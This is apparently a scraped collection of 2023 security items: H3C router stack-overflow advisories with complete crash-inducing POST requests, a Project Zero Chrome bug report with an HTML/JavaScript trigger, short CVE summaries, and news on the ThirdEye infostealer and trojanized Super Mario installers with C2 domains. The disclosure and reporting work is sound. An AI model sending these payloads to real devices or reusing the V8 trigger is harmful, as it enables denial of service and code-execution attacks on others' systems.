A stack overflow in the UpdateWanMode function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is UpdateWanMode, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v6 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=UpdateWanMode&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

**Result**

the process webs restart

CVE-2023-34932: vuln/H3C_B1STW/CVE-2023-34932.md at main · h4kuy4/vuln

A stack overflow in the AddMacList function of H3C Magic B1STV100R012 allows attackers to cause a Denial of Service (DoS) via a crafted POST request.

**Overview**

> Vendor: H3C Product: Magic B1ST Version: H3C\_Magic\_B1STV100R012 Type: Stack Overflow

**Vulnerability**

In route/goform/aspForm, the value of the key CMD is AddMacList, the program will go into the following handling function.

First it get the value of the key param, then use sscanf to copy the the value of param to a array v12 on the stack. The parameter %s of sscanf didn't limit the copy length.

**PoC**

POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/wan\_new.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=
Connection: close

CMD=AddMacList&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;;;;

**Result**

the process webs restart

CVE-2023-34929: vuln/H3C_B1STW/CVE-2023-34929.md at main · h4kuy4/vuln

By Waqas
For now, ThirdEye infostealer has demonstrated behavior that is highly malicious, albeit not-so-sophisticated in its patterns.
This is a post from HackRead.com Read the original post: Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

**While the ThirdEye infostealer is now in town, researchers have already identified several of its variants, all aiming at victims’ data.**

FortiGuard Labs uncovered a not-so-sophisticated but highly malicious infostealer while analyzing suspicious files during a cursory review. They named this ThirdEye Infostealer. According to the report authored by Fred Gutierrez, James Slaughter, and Shunichi Imano, researchers became suspicious after spotting an archive file in Russian titled “Табель учета рабочего времени.zip“, which means “time sheet” in the English language.

This file contained two additional files, both with double extensions, including a .exe extension and another document-related extension. One of these files is titled “CMK Правила оформления больничных листов.pdf.exe.”

The title means “QMS Rules for issuing sick leave” in the English language. Further investigation revealed traits that researchers had previously seen in ThirdEye infostealer samples they had been detecting since early April 2023.

**Various Versions of ThirdEye ThirdEye Infostealer Discovered**

The earliest sample of ThirdEye infostealer was discovered on 3 April 2023 at 12:36:37 GMT. This sample collected client\_hash,  OS\_type, host\_name and user\_name and sent it to C2 server “(glovatickets(.)ru/ch3ckState)” with a custom web request header: Cookie: 3rd\_eye=. It was submitted to a file scanning service on 4 April 2023.

A few weeks later, researchers found a variant which had a compile timestamp of 26 April 09:56:55 GMT. This variant collected additional data, including the BIOS vendor and release date, RAM size, CPU core number, user’s desktop files list, list of registered users on the device, and network interface data. However, this version crashes in some virtual machines.

One day later, they found a new variant with just one change: it used a PDF icon. This variant used “(ohmycars(.)ru/ch3ckState)” as C2 communications.

Later, another variant was found which gathered additional data such as total and free disk space on the C drive, domain name, network ports list, list of programs and version numbers, systemUptime, CD-ROM, drive letters volume information, currently running processes list, and programs installed in the Program Files directory.

Another file in the archive WAS titled “Табель учета рабочего времени.xls.exe,” which is a ThirdEye infostealer variant capable of performing the same activities.

Credit: FortiGuard Labs

**Functionalities of ThirdEye Infostealer**

in their blog post, FortiGuard Labs’ researchers revealed that ThirdEye Infostealer can steal system data from infected devices, including BIOS and hardware information. In addition, it can enumerate folder files, running processes, and network data.

Upon execution, the infostealer quickly gathers the data and transmits it to a C2 server hosted at “shlalala(.)ru/ch3ckState.” Apart from this, ThirdEye Infostealer does not perform any other function.

While researching, an interesting feature was noted – a string named 3rd eye, from which they derived the name of this malware family. The malware decrypts this string and uses it with another hash value to identify the C2 server. ThirdEye infostealer isn’t too sophisticated; however, it is evolving fast. Some recently collected samples stole more system data than the previously discovered versions.

Moreover, researchers noted that the infostealer targets Windows-based systems with a medium severity level. There is currently no evidence that ThirdEye Infostealer has been used in attacks.

However, since it is designed to collect data from compromised devices and systems, it can come in handy for cybercriminals in launching attacks. Researchers believe that all previous and latest variants of ThirdEye Infostealer are named in Russian, so the attacker is probably eyeing Russian-speaking organizations to deploy malware.

**RELATED ARTICLES**

1.  Legion: SMS Hijacking Malware Sold on Telegram
2.  New Jupyter infostealer dropped through MSI installer
3.  Malicious ChatGPT Installers Distribute RedLine Stealer
4.  Infostealer Adrozek malware hits Firefox, Chrome browser
5.  New MacStealer Malware Targeting macOS Catalina Devices

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Newly Surfaced ThirdEye Infostealer Targeting Windows Devices

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS  
1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.  
2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:  
```  
IDLMemberInstaller::InstallAttributes ->  
InstallAttribute ->  
Object::SetAccessorProperty ->  
JSObject::DefineAccessor  
```  
3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.  
4. Some origin trials install attributes directly on the global object.

To exploit the issue:

1. Add a non-configurable property to the global object.  
2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.  
3. Enable an origin trial that redefines the property as configurable.  
4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION  
Google Chrome 112.0.5615.49 (Official Build) (arm64)  
Chromium 114.0.5713.0 (Developer Build) (64-bit) 

REPRODUCTION CASE  
```  
<body>  
<script>  
var container = [{}];  
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(  
    globalThis,  
    'documentPictureInPicture',  
    { configurable: false, writable: true, value: {} });  
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.  
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property  
// on the global object.  
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content =  
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +  
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +  
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';  
document.head.appendChild(meta);

delete documentPictureInPicture;  
trigger();  
container[0].prop; // Trying to access a property of the hole object should cause to a crash.  
</script>  
</body>  
```

CREDIT INFORMATION  
Sergei Glazunov of Google Project Zero

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-07-13.

Related CVE Numbers: CVE-2023-2724.

Found by: glazunov@google.com

Chrome Internal JavaScript Object Access Via Origin Trials

The Contour Service was not checking that users had permission to create an analysis for a given dataset. This could allow an attacker to clutter up Compass folders with extraneous analyses, that the attacker would otherwise not have permission to create.

CVE-2023-22834: Palantir | Trust and Security Portal

Multiple Services such as VHS(Video History Server) and VCD(Video Clip Distributor) and Clips2 were discovered to be vulnerable to an unauthenticated arbitrary file read/write vulnerability due to missing input validation on filenames. A malicious attacker could read sensitive files from the filesystem or write/delete arbitrary files on the filesystem as well.

CVE-2023-30945: Palantir | Trust and Security Portal

Type Confusion in V8 in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-3420

Use after free in Guest View in Google Chrome prior to 114.0.5735.198 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-3422

Use after free in Media in Google Chrome prior to 114.0.5735.198 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-3421: Stable Channel Update for Desktop

By Deeba Ahmed
Cyble Research and Intelligence Lab's cybersecurity researchers have disclosed how threat actors exploit gamers by delivering malware-loaded installers of popular games.
This is a post from HackRead.com Read the original post: Fake Super Mario 3 Installers Drop Crypto Miner, Data Stealer

**The malware has the potential to target large-scale victims since games like Super Mario 3 are famous among and adored by children around the world.**

Recently, Cyble researchers discovered a trojanized version of the Super Mario 3: Mario Forever installer. The malware hidden inside the installer can perform various malicious tasks, such as stealing sensitive data, deploying cryptocurrency miners, and launching ransomware.

**Beware of Fake Super Mario 3 Installer**

Researchers have noted that game installers have emerged as a lucrative way to maximize monetary gains. Threat actors prefer to exploit game installers for delivering malware due to their extensive user base, powerful hardware, and large file size, which allows them to easily hide malware. Gamers trust these installers, considering them legitimate software, but social engineering can allow attackers to exploit this trust and trick gamers into downloading malware.

In this case, the researchers wrote that the fake installer comes with three executable files. One of these files installs the game, while the other two files, titled java.exe and atom.exe, are installed in the AppData directory on the device. Both files are assigned different tasks.

*   Java.exe- it may look like a regular Java runtime, but in reality, it is a Monero cryptocurrency miner tasked with establishing a connection to a mining server (gulfmonerooceanstream).
*   Atom.exe- It is a self-duplicating SupremeBot mining client that creates a scheduled task for executing the copy every fifteen minutes. SupremeBot has to fetch another executable, “wime.exe,” after establishing a connection to a C2 server.

**How does it work?**

After the malicious installer file “super-mario-forever-v702e” is installed on the system, it launches an XMR miner and a SupremeBot mining program through two files. Once this is done, a connection to the C2 server is established to transmit data information, register the client, and obtain the required configuration to start cryptocurrency mining. This is followed by fetching the “wime.exe” executable, an open-source Umbral Stealer.

Malware-infected Super Mario game installer (left) – Malware files upon installation (right) – Screenshots credit: Cyble

The Umbral Stealer is capable of stealing sensitive user data from the targeted device, which includes stored cookies and passwords, session tokens, credentials from cryptocurrency wallets, and authentication tokens for other platforms or games. Additionally, it disables Windows Defender to evade detection if tamper protection is inactive. However, if tamper protection is active, it adds the process to the exclusion list.

**Potential Dangers**

The malicious Super Mario 3 installer is quite lethal as it is capable of cryptocurrency mining and data stealing. This can result in heavy financial losses for victims and drain computer resources, causing a decline in system performance.

“Malware distributed through game installers can be monetized through activities like stealing sensitive information, conducting ransomware attacks, and more,” Cyble’s report read.

1.  Alert: Android Super Mario Run is Actually Malware
2.  Minecraft declared the most malware-infected game
3.  Stop downloading fake malicious Fortnite Android apps
4.  ROBLOX, Nintendo game cracks drop ChromeLoader malware

Tag

#chrome